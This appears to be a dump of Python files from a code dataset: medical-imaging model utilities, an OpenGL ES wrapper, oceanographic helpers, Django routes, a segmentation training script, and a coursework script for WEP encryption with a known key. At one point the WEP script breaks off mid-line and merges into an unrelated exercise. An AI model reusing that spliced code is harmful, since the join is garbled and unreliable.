NotImplementedError(f\"Optimizer type {args.optimizer_type.value} is not implemented\")\n\n\ndef summary_for_segmentation_models(config: ModelConfigBase, model: DeviceAwareModule) -> None:\n \"\"\"\n Generates a human readable summary of the present segmentation model, writes it to logging.info, and\n stores the ModelSummary object inside the argument `model`.\n\n :param config: The configuration for the model.\n :param model: The instantiated Pytorch model.\n \"\"\"\n assert isinstance(model, BaseModel)\n crop_size = config.crop_size\n if isinstance(crop_size, int):\n crop_size = (crop_size, crop_size, crop_size)\n try:\n model.generate_model_summary(crop_size, log_summaries_to_files=config.log_summaries_to_files)\n except AttributeError as e:\n logging.warning(f\"summary_for_segmentation_models failed with exception {e}\")\n\n\ndef generate_and_print_model_summary(config: ModelConfigBase, model: DeviceAwareModule) -> None:\n \"\"\"\n Writes a human readable summary of the present model to logging.info, and logs the number of trainable\n parameters to AzureML.\n\n :param config: The configuration for the model.\n :param model: The instantiated Pytorch model.\n \"\"\"\n random_state = RandomStateSnapshot.snapshot_random_state()\n # There appears to be a bug in apex, where previous use (in training for example) causes problems\n # when another model is later built on the CPU (for example, before loading from a checkpoint)\n # https://github.com/NVIDIA/apex/issues/694\n # Hence, move the model to the GPU before doing model summary.\n if config.use_gpu:\n model = model.cuda()\n if isinstance(config, ScalarModelBase):\n # To generate the model summary, read the first item of the dataset. Then use the model's own\n # get_model_input function to convert the dataset item to input tensors, and feed them through the model.\n train_dataset = config.get_torch_dataset_for_inference(ModelExecutionMode.TRAIN)\n train_item_0 = next(iter(train_dataset.as_data_loader(shuffle=False, batch_size=1, num_dataload_workers=0)))\n model_inputs = get_scalar_model_inputs_and_labels(config, model, train_item_0).model_inputs\n # The model inputs may already be converted to float16, assuming that we would do mixed precision.\n # However, the model is not yet converted to float16 when this function is called, hence convert back to float32\n summary = ModelSummary(model)\n summary.generate_summary(input_tensors=model_inputs, log_summaries_to_files=config.log_summaries_to_files)\n elif config.is_segmentation_model:\n summary_for_segmentation_models(config, model)\n assert model.summarizer\n summary = model.summarizer # type: ignore\n else:\n raise ValueError(\"Don't know how to generate a summary for this type of model?\")\n RUN_CONTEXT.log(LoggingColumns.NumTrainableParameters, summary.n_trainable_params)\n random_state.restore_random_state()\n\n\ndef load_checkpoint(model: torch.nn.Module,\n path_to_checkpoint: Path,\n optimizer: Optional[Optimizer] = None,\n optimizer_to_gpu: Optional[bool] = False) -> Optional[int]:\n \"\"\"\n Loads a checkpoint of a model.\n The epoch of the stored model and the epoch provided as argument must match.\n The provided model must match the stored model.\n\n :param model: The DataParallel object representing the network. Must have the same architecture of the stored model.\n :param path_to_checkpoint: The path to the checkpoint file.\n :param optimizer: The optimizer used for training\n :param optimizer_to_gpu: If true, move the optimizer to GPU, which we need to do if the model is also on GPU.\n :return: The checkpoint epoch if loaded and None if not loaded\n \"\"\"\n\n if not path_to_checkpoint.is_file():\n logging.warning(f'No checkpoint found at {path_to_checkpoint} current working dir {os.getcwd()}')\n return None\n\n logging.info(f\"Loading checkpoint {path_to_checkpoint}\")\n # For model debugging, allow loading a GPU trained model onto the CPU. This will clearly only work\n # if the model is small.\n map_location = None if is_gpu_available() else 'cpu'\n checkpoint = torch.load(str(path_to_checkpoint), map_location=map_location)\n\n if isinstance(model, torch.nn.DataParallel):\n model.module.load_state_dict(checkpoint['state_dict'])\n else:\n model.load_state_dict(checkpoint['state_dict'])\n\n if optimizer is not None:\n opt_dict = checkpoint['opt_dict']\n if optimizer_to_gpu:\n # https://github.com/pytorch/pytorch/issues/2830\n for key, val in opt_dict.items():\n if isinstance(val, torch.Tensor):\n opt_dict[key] = val.cuda()\n optimizer.load_state_dict(opt_dict)\n\n logging.info(\"Loaded checkpoint (epoch: {})\".format(checkpoint['epoch']))\n return checkpoint['epoch']\n\n\ndef save_checkpoint(model: torch.nn.Module, optimizer: Optimizer, epoch: int,\n args: ModelConfigBase, mean_teacher_model: bool = False) -> None:\n \"\"\"\n Saves a checkpoint of the current model and optimizer_type parameters in the specified folder\n and uploads it to the output blob storage of the current run context.\n The checkpoint's name for epoch 123 would be 123_checkpoint.pth.tar.\n\n :param model: A DataParallel object representing the model.\n :param optimizer: The optimizer_type used for training.\n :param epoch: The last epoch used to train the model.\n :param args:\n :param mean_teacher_model: If True save to the mean teacher model checkpoint path.\n \"\"\"\n logging.getLogger().disabled = True\n\n model_state_dict = model.module.state_dict() if isinstance(model, torch.nn.DataParallel) else model.state_dict()\n checkpoint_file_path = args.get_path_to_checkpoint(epoch, mean_teacher_model)\n info_to_store = {\n 'epoch': epoch,\n 'state_dict': model_state_dict,\n 'opt_dict': optimizer.state_dict()\n }\n torch.save(info_to_store, checkpoint_file_path)\n logging.getLogger().disabled = False\n logging.info(\"Saved model checkpoint for epoch {} to {}\".format(epoch, checkpoint_file_path))\n\n\ndef load_from_checkpoint_and_adjust(model_config: ModelConfigBase,\n path_to_checkpoint: Path,\n model_and_info: Optional[ModelAndInfo] = None) -> ModelAndInfo:\n \"\"\"\n Creates a model as per the configuration, and loads the parameters from the given checkpoint path.\n The model is then adjusted for data parallelism and mixed precision, running in TEST mode.\n\n :param model_config: The configuration from which an empty model will be created (if existing_model is None)\n :param path_to_checkpoint: The path to the checkpoint file.\n :param model_and_info: optional model and associated info; created from model_config if None\n :return: The model with all loaded parameters, the (adjusted) optimizer, and the epoch in which the model was saved.\n If the checkpoint_epoch is None, there is no model file at the given path.\n \"\"\"\n # Create model if necessary\n if model_and_info is None:\n model_and_info = ModelAndInfo(create_model_with_temperature_scaling(model_config))\n # Load the stored model. If there is no checkpoint present, return immediately.\n model_and_info.checkpoint_epoch = load_checkpoint(model=model_and_info.model,\n path_to_checkpoint=path_to_checkpoint,\n optimizer=model_and_info.optimizer,\n optimizer_to_gpu=model_config.use_gpu)\n if model_and_info.checkpoint_epoch is None:\n return model_and_info\n # Enable data/model parallelization\n if model_config.is_segmentation_model:\n # Generate the model summary, which is required for model partitioning across GPUs.\n summary_for_segmentation_models(model_config, model_and_info.model)\n return update_model_for_multiple_gpus(\n model_and_info, args=model_config, execution_mode=model_and_info.model_execution_mode)\n\n\ndef create_model_with_temperature_scaling(config: ModelConfigBase) -> Any:\n \"\"\"\n Create a model with temperature scaling by wrapping the result of config.create_model with ModelWithTemperature,\n if temperature scaling config has been provided, otherwise return the result of config.create_model\n \"\"\"\n # wrap the model around a temperature scaling model if required\n model = config.create_model()\n if isinstance(config, SequenceModelBase) and config.temperature_scaling_config:\n model = ModelWithTemperature(model, config.temperature_scaling_config)\n return model\n","sub_path":"InnerEye/ML/utils/model_util.py","file_name":"model_util.py","file_ext":"py","file_size_in_byte":18393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"535225028","text":"#\n# Copyright (c) 2012 Peter de Rivaz\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted.\n#\n# Raspberry Pi 3d demo using OpenGLES 2.0 via Python\n#\n# Version 0.1 (Draws a rectangle using vertex and fragment shaders)\n# Version 0.2 (Draws a Julia set on top of a Mandelbrot controlled by the mouse. Mandelbrot rendered to texture in advance.\n\nimport ctypes\nimport time\nimport math\n# Pick up our constants extracted from the header files with prepare_constants.py\nfrom .egl import *\nfrom .gl2 import *\nfrom .gl2ext import *\n\n# Define verbose=True to get debug messages\nverbose = True\n\n# Define some extra constants that the automatic extraction misses\nEGL_DEFAULT_DISPLAY = 0\nEGL_NO_CONTEXT = 0\nEGL_NO_DISPLAY = 0\nEGL_NO_SURFACE = 0\nDISPMANX_PROTECTION_NONE = 0\n\n# Open the libraries\nbcm = ctypes.CDLL('libbcm_host.so')\nopengles = ctypes.CDLL('libbrcmGLESv2.so')\nopenegl = ctypes.CDLL('libbrcmEGL.so')\n\neglint = ctypes.c_int\n\neglshort = ctypes.c_short\n\ndef eglints(L):\n \"\"\"Converts a tuple to an array of eglints (would a pointer return be better?)\"\"\"\n return (eglint*len(L))(*L)\n\neglfloat = ctypes.c_float\n\ndef eglfloats(L):\n return (eglfloat*len(L))(*L)\n\ndef check(e):\n \"\"\"Checks that error is zero\"\"\"\n if e==0: return\n if verbose:\n print('Error code',hex(e&0xffffffff))\n raise ValueError\n\nclass EGL(object):\n\n def __init__(self,depthbuffer=False):\n \"\"\"Opens up the OpenGL library and prepares a window for display\"\"\"\n b = bcm.bcm_host_init()\n assert b==0\n self.display = openegl.eglGetDisplay(EGL_DEFAULT_DISPLAY)\n assert self.display\n r = openegl.eglInitialize(self.display,0,0)\n assert r\n if depthbuffer:\n attribute_list = eglints( (EGL_RED_SIZE, 8,\n EGL_GREEN_SIZE, 8,\n EGL_BLUE_SIZE, 8,\n EGL_ALPHA_SIZE, 8,\n EGL_SURFACE_TYPE, EGL_WINDOW_BIT,\n EGL_DEPTH_SIZE, 16,\n EGL_NONE) )\n else:\n attribute_list = eglints( (EGL_RED_SIZE, 8,\n EGL_GREEN_SIZE, 8,\n EGL_BLUE_SIZE, 8,\n EGL_ALPHA_SIZE, 8,\n EGL_SURFACE_TYPE, EGL_WINDOW_BIT,\n EGL_NONE) )\n # EGL_SAMPLE_BUFFERS, 1,\n # EGL_RENDERABLE_TYPE, EGL_OPENGL_ES2_BIT,\n\n numconfig = eglint()\n config = ctypes.c_void_p()\n r = openegl.eglChooseConfig(self.display,\n ctypes.byref(attribute_list),\n ctypes.byref(config), 1,\n ctypes.byref(numconfig));\n assert r\n r = openegl.eglBindAPI(EGL_OPENGL_ES_API)\n assert r\n if verbose:\n print('numconfig=',numconfig)\n context_attribs = eglints( (EGL_CONTEXT_CLIENT_VERSION, 2, EGL_NONE) )\n self.context = openegl.eglCreateContext(self.display, config,\n EGL_NO_CONTEXT,\n ctypes.byref(context_attribs))\n assert self.context != EGL_NO_CONTEXT\n width = eglint()\n height = eglint()\n s = bcm.graphics_get_display_size(0,ctypes.byref(width),ctypes.byref(height))\n self.width = width\n self.height = height\n assert s>=0\n dispman_display = bcm.vc_dispmanx_display_open(0)\n dispman_update = bcm.vc_dispmanx_update_start( 0 )\n dst_rect = eglints( (0,0,width.value,height.value) )\n src_rect = eglints( (0,0,width.value<<16, height.value<<16) )\n assert dispman_update\n assert dispman_display\n dispman_element = bcm.vc_dispmanx_element_add ( dispman_update, dispman_display,\n 0, ctypes.byref(dst_rect), 0,\n ctypes.byref(src_rect),\n DISPMANX_PROTECTION_NONE,\n 0 , 0, 0)\n bcm.vc_dispmanx_update_submit_sync( dispman_update )\n nativewindow = eglints((dispman_element,width,height));\n nw_p = ctypes.pointer(nativewindow)\n self.nw_p = nw_p\n self.surface = openegl.eglCreateWindowSurface( self.display, config, nw_p,\n eglints((EGL_RENDER_BUFFER, EGL_SINGLE_BUFFER, EGL_NONE)) )\n assert self.surface != EGL_NO_SURFACE\n r = openegl.eglMakeCurrent(self.display, self.surface, self.surface, self.context)\n assert r\n\n\n","sub_path":"pyopengles/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"58756809","text":"import xarray as xr\n\n\ndef to_rho(var, grid, boundary='extend'):\n if var.dims[-1] != 'xi_rho':\n var = grid.interp(var, 'X', to='center', boundary=boundary)\n if var.dims[-2] != 'eta_rho':\n var = grid.interp(var, 'Y', to='center', boundary=boundary)\n return var\n\n\ndef to_psi(var, grid, boundary='extend'):\n if var.dims[-1] != 'xi_u':\n var = grid.interp(var, 'X', to='inner', boundary=boundary)\n if var.dims[-2] != 'eta_v':\n var = grid.interp(var, 'Y', to='inner', boundary=boundary)\n return var\n\n\ndef xisoslice(iso_array, iso_value, projected_array, coord):\n '''Calculate an isosurface\n\n This function calculates the value of projected_array on\n an isosurface in the array iso_array defined by iso_val.\n\n Inputs:\n iso_array: xarray.DataArray in which the isosurface is defined\n iso_value: float: value of the isosurface in iso_array\n projected_array: xarray.DataArray in which to project values on the isosurface\n Needs to have the same dimensions and shape as iso_array\n coord: string: coordinate associated with the dimension along which to project\n\n Output:\n iso_values: xarray.DataArray: values of projected_array on the isosurface\n '''\n Nm = len(iso_array[coord]) - 1\n\n lslice = {coord: slice(None, -1)}\n uslice = {coord: slice(1, None)}\n\n prop = iso_array - iso_value\n\n propl = prop.isel(**lslice)\n propl.coords[coord] = np.arange(Nm)\n propu = prop.isel(**uslice)\n propu.coords[coord] = np.arange(Nm)\n\n zc = xr.where((propu*propl)<0.0, 1.0, 0.0)\n\n varl = projected_array.isel(**lslice)\n varl.coords[coord] = np.arange(Nm)\n varu = projected_array.isel(**uslice)\n varu.coords[coord] = np.arange(Nm)\n\n propl = (propl*zc).sum(coord)\n propu = (propu*zc).sum(coord)\n varl = (varl*zc).sum(coord)\n varu = (varu*zc).sum(coord)\n\n return varl - propl*(varu-varl)/(propu-propl)\n","sub_path":"xroms/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":1949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"10973433","text":"# make a histogra of dihedral angles for ring orientation \n# Derek Fujimoto\n# Jan 2018\n\nfrom Film import Film\nfrom PsSim import PsSim \nimport pandas as pd\nimport numpy as np\n\n# Settings\nfilename = \"5_stab%d_angles.csv\"\ndirectory = '../seed12345/'\nfilebase = '5_stab%d'\nring_draw_id = 0\nnbins = 1000\ntimestep = 2e-6 # ns / timestep\nnproc = 4\n\nT = np.arange(410,501,10)\n\n# Fetch angles\nfor t in T:\n film = Film(directory+filebase%t,datafile=directory+'unitedAtom.data')\n film.nproc = nproc\n film.get_ring_angles(filename%t)\n del film\n","sub_path":"film2_UA/attempt1/15nm/analysis/get_angles.py","file_name":"get_angles.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"653317165","text":"from django.conf.urls import url\n\nfrom . import views\n\n\nurlpatterns = [\n url(r'^(?P\\d+)/$', views.CommentCreate.as_view(), name='comments_comment_create'),\n url(r'^upvote/(?P\\d+)/$', views.upvote, name='comments_comment_upvote'),\n url(r'^downvote/(?P\\d+)/$', views.downvote, name='comments_comment_downvote'),\n]\n","sub_path":"comments/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"136435859","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.8 (3413)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /usr/lib/python3.8/site-packages/nielsen/files.py\n# Compiled at: 2020-05-04 00:23:44\n# Size of source mod 2**32: 1932 bytes\n\"\"\"\nSystem-level file operations needed by the API. These functions operate on the\nvarious Path class objects provided by the pathlib library. These functions\nprobably won't ever need to be called directly by a client.\n\"\"\"\nimport logging\nfrom shutil import chown, move as su_move\nfrom nielsen.config import CONFIG\n\ndef set_file_mode(file):\n \"\"\"Set the mode of `file` to the value defined in `CONFIG`.\"\"\"\n if CONFIG.get('Options', 'Mode'):\n try:\n file.chmod(int(CONFIG.get('Options', 'Mode'), 8))\n except PermissionError as err:\n try:\n logging.error('chmod failed. %s', err)\n raise\n finally:\n err = None\n del err\n\n\ndef set_file_ownership(file):\n \"\"\"Set owner and group of `file` to the values defined in `CONFIG`.\"\"\"\n if CONFIG.get('Options', 'User') or CONFIG.get('Options', 'Group'):\n try:\n chown(file, CONFIG.get('Options', 'User') or None, CONFIG.get('Options', 'Group') or None)\n status = True\n except PermissionError as err:\n try:\n logging.error('chown failed. %s', err)\n raise\n finally:\n err = None\n del err\n\n\ndef create_hierarchy(file):\n \"\"\"Create the directory hierarchy for the given `file`.\"\"\"\n try:\n file.parent.mkdir(mode=(int(CONFIG.get('Options', 'mode'), 8)), parents=True,\n exist_ok=True)\n logging.debug('Created: %s', file.parent)\n status = True\n except FileExistsError:\n logging.debug('%s already exists', file.parent)\n except PermissionError as err:\n try:\n logging.error(err)\n raise\n finally:\n err = None\n del err\n\n\ndef move(src, dst):\n \"\"\"Move the file `src` to the path `dst`, but do not overwrite existing files.\"\"\"\n if dst.exists() or src == dst:\n logging.debug('%s already in MediaPath. File will not be moved.', dst)\n try:\n su_move(src, dst)\n except PermissionError as err:\n try:\n logging.error(err)\n raise\n finally:\n err = None\n del err","sub_path":"pycfiles/Nielsen-2.2.0.linux-x86_64.tar/files.cpython-38.py","file_name":"files.cpython-38.py","file_ext":"py","file_size_in_byte":2472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"108874027","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\" Manually decrypt a wep message given the WEP key\"\"\"\n\n__author__ = \"Abraham Rubinstein\"\n__copyright__ = \"Copyright 2017, HEIG-VD\"\n__license__ \t= \"GPL\"\n__version__ \t= \"1.0\"\n__email__ \t\t= \"abraham.rubinstein@heig-vd.ch\"\n__status__ \t\t= \"Prototype\"\n\nfrom scapy.all import *\nimport binascii\nimport zlib\nfrom rc4 import RC4\n\nif len(sys.argv) == 3: # Demand number of fake SSID\n key = binascii.unhexlify(sys.argv[1].replace(\":\", \"\"))\n message = binascii.unhexlify(sys.argv[2].replace(\":\", \"\"))\nelse: # Reading file spliting every '\\n'\n print(\"%s \" % sys.argv[0])\n print(\"\\tkey has [0-9A-F]{2}((:)?[0-9A-F]{2})*\")\n print(\"\\tmessage has [0-9A-F]{2}((:)?[0-9A-F]{2})*\")\n exit(-1)\n\n# Creation de la checksum du message\nicv = struct.pack(' 18:\n qtdmais18 += 1\n if sexo in 'mM':\n qtdhomens += 1\n if sexo in 'Ff' and idade < 20:\n qtdmulheresmenos20 += 1\n cont += 1\n while True:\n resposta = str(input('Quer continuar? [S/N]')).strip()[0]\n if resposta in 'SsNn':\n break\n if resposta in 'Nn':\n break\nprint('{} pessoas tem mais de 18 anos.'.format(qtdmais18))\nprint('{} homens foram cadastrados.'.format(qtdhomens))\nprint('{} mulheres tem menos de 20 anos.'.format(qtdmulheresmenos20))\nprint('{} pessoas foram cadastradas.'.format(cont))","sub_path":"basic-python/desafio069.py","file_name":"desafio069.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"345847618","text":"from __future__ import print_function\n\nimport argparse\nimport os\nimport pickle\nimport sys\nfrom datetime import datetime\n\nimport matplotlib\nimport numpy as np\nimport torch\n\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\n\nimport code.archs as archs\nfrom code.utils.cluster.general import config_to_str, get_opt, update_lr\nfrom code.utils.cluster.transforms import sobel_process\nfrom code.utils.segmentation.data import make_Coco_dataloaders, \\\n make_Potsdam_dataloaders\nfrom code.utils.segmentation.baselines.kmeans_segmentation_eval import \\\n kmeans_segmentation_eval\nfrom code.utils.segmentation.baselines.isola_utils import isola_loss, \\\n isola_set_patches\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--model_ind\", type=int, required=True)\nparser.add_argument(\"--arch\", type=str, required=True)\nparser.add_argument(\"--opt\", type=str, default=\"Adam\")\n\nparser.add_argument(\"--dataset\", type=str, required=True)\nparser.add_argument(\"--dataset_root\", type=str, required=True)\n\n# for COCO\nparser.add_argument(\"--fine_to_coarse_dict\", type=str,\n default=\"/users/xuji/iid/iid_private/code/datasets\"\n \"/segmentation/util/out/fine_to_coarse_dict.pickle\")\n\n# COCO and Potsdam\nparser.add_argument(\"--use_coarse_labels\", default=False,\n action=\"store_true\") # new\n\n# for COCO only\nparser.add_argument(\"--include_things_labels\", default=False,\n action=\"store_true\") # new\nparser.add_argument(\"--incl_animal_things\", default=False,\n action=\"store_true\") # new\n\nparser.add_argument(\"--gt_k\", type=int, required=True)\n\nparser.add_argument(\"--lr\", type=float, default=0.01)\nparser.add_argument(\"--lr_schedule\", type=int, nargs=\"+\", default=[])\nparser.add_argument(\"--lr_mult\", type=float, default=0.1)\n\nparser.add_argument(\"--num_epochs\", type=int, default=3200)\nparser.add_argument(\"--batch_sz\", type=int, required=True)\n\nparser.add_argument(\"--out_root\", type=str,\n default=\"/scratch/shared/slow/xuji/iid_private\")\nparser.add_argument(\"--restart\", default=False, action=\"store_true\")\nparser.add_argument(\"--no_pre_eval\", default=False, action=\"store_true\")\n\nparser.add_argument(\"--coco_164k_curated_version\", type=int, default=-1)\n\nparser.add_argument(\"--save_multiple\", default=False, action=\"store_true\")\nparser.add_argument(\"--verbose\", default=False, action=\"store_true\")\n\nparser.add_argument(\"--max_num_kmeans_samples\", type=int, default=-1)\n\n# Isola options\nparser.add_argument(\"--isola_patch_side\", type=int, default=11)\n\n# data options common to both img1 and img2\nparser.add_argument(\"--no_sobel\", default=False, action=\"store_true\")\nparser.add_argument(\"--include_rgb\", default=False, action=\"store_true\")\n\nparser.add_argument(\"--pre_scale_all\", default=False,\n action=\"store_true\") # new\nparser.add_argument(\"--pre_scale_factor\", type=float, default=0.5) #\n\nparser.add_argument(\"--input_sz\", type=int, default=161)\n\n# data options for img2 (i.e. transforms we learn invariance/equivariance for)\n# jitter invariance\nparser.add_argument(\"--jitter_brightness\", type=float, default=0.4)\nparser.add_argument(\"--jitter_contrast\", type=float, default=0.4)\nparser.add_argument(\"--jitter_saturation\", type=float, default=0.4)\nparser.add_argument(\"--jitter_hue\", type=float, default=0.125)\n\n# flip equivariance\nparser.add_argument(\"--flip_p\", type=float, default=0.5)\n\nconfig = parser.parse_args()\n\nassert (not (config.no_sobel and (not config.include_rgb)))\nassert (\"Isola\" in config.arch)\n\nif \"Coco\" in config.dataset:\n if not config.include_rgb:\n config.in_channels = 2 # just sobel\n else:\n config.in_channels = 3 # rgb\n if not config.no_sobel:\n config.in_channels += 2 # rgb + sobel\n config.using_IR = False\nelif config.dataset == \"Potsdam\":\n if not config.include_rgb:\n config.in_channels = 1 + 2 # ir + sobel\n else:\n config.in_channels = 4 # rgbir\n if not config.no_sobel:\n config.in_channels += 2 # rgbir + sobel\n\n config.using_IR = True\nelse:\n assert (False)\n\n# list of dataloaders has one dataloader, which returns single pair (img,\n# mask) for training\nconfig.num_dataloaders = 1\nconfig.single_mode = True # used by dataset\n\nconfig.use_random_scale = False\nconfig.use_random_affine = False\n\nconfig.out_dir = os.path.join(config.out_root, str(config.model_ind))\n# assert(config.batch_sz % config.num_dataloaders == 0)\nconfig.dataloader_batch_sz = int(config.batch_sz / config.num_dataloaders)\n\n# copy of IID, or fully unsupervised eval, setting\n# PERM, one-to-one, IID:\n# mapping can be found and tested on *same set*\n\nif \"Coco10k\" in config.dataset:\n config.train_partitions = [\"all\"]\n config.mapping_assignment_partitions = [\"all\"]\n config.mapping_test_partitions = [\"all\"]\nelif \"Coco164k\" in config.dataset:\n config.train_partitions = [\"train2017\", \"val2017\"]\n config.mapping_assignment_partitions = [\"train2017\", \"val2017\"]\n config.mapping_test_partitions = [\"train2017\", \"val2017\"]\nelif config.dataset == \"Potsdam\":\n config.train_partitions = [\"unlabelled_train\", \"labelled_train\",\n \"labelled_test\"]\n config.mapping_assignment_partitions = [\"labelled_train\", \"labelled_test\"]\n config.mapping_test_partitions = [\"labelled_train\", \"labelled_test\"]\nelse:\n assert (False)\n\nprint(\"Given config: %s\" % config_to_str(config))\n\nif not os.path.exists(config.out_dir):\n os.makedirs(config.out_dir)\n\nif config.restart:\n given_config = config\n reloaded_config_path = os.path.join(given_config.out_dir, \"config.pickle\")\n print(\"Loading restarting config from: %s\" % reloaded_config_path)\n with open(reloaded_config_path, \"rb\") as config_f:\n config = pickle.load(config_f)\n assert (config.model_ind == given_config.model_ind)\n config.restart = True\n\n # copy over new num_epochs and lr schedule\n config.num_epochs = given_config.num_epochs\n config.lr_schedule = given_config.lr_schedule\n\n# Data -------------------------------------------------------------------------\n\n# datasets produce either 2 or 5 channel images based on config.include_rgb\n\n# because fully unsupervised\nassert (config.mapping_assignment_partitions == config.mapping_test_partitions)\n\nif \"Coco\" in config.dataset:\n dataloaders, mapping_assignment_test_dataloader, _ = \\\n make_Coco_dataloaders(config)\nelif config.dataset == \"Potsdam\":\n dataloaders, mapping_assignment_test_dataloader, _ = \\\n make_Potsdam_dataloaders(config)\nelse:\n raise NotImplementedError\n\nnum_train_batches = len(dataloaders[0])\nprint(\"length of train dataloader %d\" % num_train_batches)\nprint(\"length of mapping assign and test dataloader %d\" % len(\n mapping_assignment_test_dataloader))\n\nassert (len(dataloaders) == 1)\ndataloader = dataloaders[0]\n\n# networks and optimisers ------------------------------------------------------\n\nnet = archs.__dict__[config.arch](config)\nif config.restart:\n model_path = os.path.join(config.out_dir, \"latest_net.pytorch\")\n choose_best = False\n if not os.path.exists(model_path):\n print(\"latest doesn't exist, using best\")\n model_path = os.path.join(config.out_dir, \"best_net.pytorch\")\n choose_best = True\n net.load_state_dict(\n torch.load(model_path, map_location=lambda storage, loc: storage))\nnet.cuda()\nnet = torch.nn.DataParallel(net)\n\noptimiser = get_opt(config.opt)(net.module.parameters(), lr=config.lr)\nif config.restart:\n if not choose_best:\n optimiser.load_state_dict(\n torch.load(os.path.join(config.out_dir, \"latest_optimiser.pytorch\")))\n else:\n print(\"latest doesn't exist, using best\")\n optimiser.load_state_dict(torch.load(os.path.join(config.out_dir,\n \"best_optimiser.pytorch\")))\n\nif config.restart:\n if not choose_best:\n next_epoch = config.last_epoch + 1 # corresponds to last saved model\n else:\n next_epoch = np.argmax(np.array(config.epoch_acc)) + 1\n\n print(\"starting from epoch %d\" % next_epoch)\n\n # in case we overshot without saving\n config.epoch_acc = config.epoch_acc[:next_epoch]\n config.epoch_nmi = config.epoch_nmi[:next_epoch]\n config.epoch_ari = config.epoch_ari[:next_epoch]\n\n config.epoch_loss = config.epoch_loss[:(next_epoch - 1)]\nelse:\n config.epoch_acc = []\n config.epoch_nmi = []\n config.epoch_ari = []\n\n config.epoch_loss = []\n\n if (not config.no_pre_eval):\n torch.cuda.empty_cache()\n net.module.eval()\n acc, nmi, ari, masses = kmeans_segmentation_eval(config, net,\n mapping_assignment_test_dataloader)\n config.epoch_acc.append(acc)\n config.epoch_nmi.append(nmi)\n config.epoch_ari.append(ari)\n config.epoch_masses = masses.reshape((1, config.gt_k))\n\n print(\"Pre: acc %f nmi %f ari %f time %s\" % (acc, nmi, ari, datetime.now()))\n sys.stdout.flush()\n\n next_epoch = 1\n\nfig, axarr = plt.subplots(3, sharex=False, figsize=(20, 20))\n\nfor e_i in xrange(next_epoch, config.num_epochs):\n torch.cuda.empty_cache()\n\n net.module.train()\n is_best = False\n\n if e_i in config.lr_schedule:\n optimiser = update_lr(optimiser, lr_mult=config.lr_mult)\n\n avg_loss = 0. # over epoch\n\n for b_i, tup in enumerate(dataloader):\n net.module.zero_grad()\n\n img, mask = tup # cuda\n\n # no need for requires_grad or Variable (torch 0.4.1)\n if (not config.no_sobel):\n img = sobel_process(img, config.include_rgb, using_IR=config.using_IR)\n\n centre, other, adjacent = isola_set_patches(input_sz=config.input_sz,\n patch_side=config.isola_patch_side)\n adjacent_pred = net(img, centre=centre, other=other)\n\n loss = isola_loss(adjacent_pred, centre, other, adjacent, mask,\n verbose=config.verbose)\n\n if ((b_i % 100) == 0) or (e_i == next_epoch):\n print(\"Model ind %d epoch %d batch: %d loss %f \"\n \"time %s\" % \\\n (config.model_ind, e_i, b_i, float(loss.item()), datetime.now()))\n sys.stdout.flush()\n\n if not np.isfinite(loss.item()):\n print(\"Loss is not finite... %s:\" % str(loss.item()))\n exit(1)\n\n avg_loss += loss.item()\n\n loss.backward()\n optimiser.step()\n\n b_i += 1\n\n avg_loss /= num_train_batches\n avg_loss = float(avg_loss)\n\n torch.cuda.empty_cache()\n net.module.eval()\n\n acc, nmi, ari, masses = kmeans_segmentation_eval(config, net,\n mapping_assignment_test_dataloader)\n print(\"... metrics acc %f nmi %f ari %f time %s\" %\n (acc, nmi, ari, datetime.now()))\n sys.stdout.flush()\n\n if (len(config.epoch_acc) > 0) and (acc > max(config.epoch_acc)):\n is_best = True\n\n config.epoch_acc.append(acc)\n config.epoch_nmi.append(nmi)\n config.epoch_ari.append(ari)\n\n config.epoch_loss.append(avg_loss) # config stores 1\n\n masses = masses.reshape((1, config.gt_k))\n config.epoch_masses = np.concatenate((config.epoch_masses, masses), axis=0)\n\n axarr[0].clear()\n axarr[0].plot(config.epoch_loss)\n axarr[0].set_title(\"Loss\")\n\n axarr[1].clear()\n axarr[1].plot(config.epoch_acc)\n axarr[1].set_title(\"ACC\")\n\n axarr[2].clear()\n for c in xrange(config.gt_k):\n axarr[2].plot(config.epoch_masses[:, c])\n axarr[2].set_title(\"Masses (reordered)\")\n\n fig.canvas.draw_idle()\n fig.savefig(os.path.join(config.out_dir, \"plots.png\"))\n\n if is_best or (e_i % 10 == 0) or config.save_multiple:\n # save cpu version\n net.module.cpu()\n\n if is_best:\n torch.save(net.module.state_dict(),\n os.path.join(config.out_dir, \"best_net.pytorch\"))\n torch.save(optimiser.state_dict(),\n os.path.join(config.out_dir, \"best_optimiser.pytorch\"))\n\n # save model sparingly for this script\n if e_i % 10 == 0:\n torch.save(net.module.state_dict(),\n os.path.join(config.out_dir, \"latest_net.pytorch\"))\n torch.save(optimiser.state_dict(),\n os.path.join(config.out_dir, \"latest_optimiser.pytorch\"))\n config.last_epoch = e_i # for last saved version\n\n if config.save_multiple and (e_i % 3 == 0):\n torch.save(net.module.state_dict(),\n os.path.join(config.out_dir, \"e_%d_net.pytorch\" % e_i))\n\n net.module.cuda()\n\n with open(os.path.join(config.out_dir, \"config.pickle\"),\n \"wb\") as outfile:\n pickle.dump(config, outfile)\n\n with open(os.path.join(config.out_dir, \"config.txt\"),\n \"w\") as text_file:\n text_file.write(\"%s\" % 